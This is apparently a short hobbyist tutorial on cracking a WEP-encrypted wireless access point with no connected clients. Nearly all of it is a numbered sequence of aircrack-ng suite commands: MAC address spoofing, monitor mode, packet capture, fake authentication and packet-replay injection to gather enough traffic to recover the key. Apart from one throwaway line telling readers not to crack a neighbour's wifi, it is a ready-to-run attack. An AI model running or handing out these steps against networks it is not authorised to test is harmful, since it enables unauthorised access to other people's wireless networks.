Cracking a clientless wep AP
Not all AP's have a client connected ...I'll assume you already have a supported card and the injection is working !!! I'll also assume that you know what you're doing and you're not doing anything illegal ! DON'T GO CRACKING NEIGHBOURs wifi...
1) stop the card
airmon-ng stop wlan0 ifconfig wlan0 down
2) change card mac
ifconfig wlan0 hw ether 00:11:22:33:44:55 up
3) get some access points
iwlist wlan0 scan
4) start it in monitor mode
airmon-ng start wlan0
5) start dumping packets
airodump-ng -c channel -w file --bssid ap_mac wlan0
6) fake auth
aireplay-ng -1 0 -a ap_mac -h 00:11:22:33:44:55 wlan0
7) play some fake packets ( you should see the packets grow fast in the airodump-ng window )
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b ap_mac -h 00:11:22:33:44:55 wlan0
8) crack it !!!
If something's wrong .. you're probably not auth'ed .. or the injection doesn't work .. or you're too far away .. bla bla bla.. Not my problem.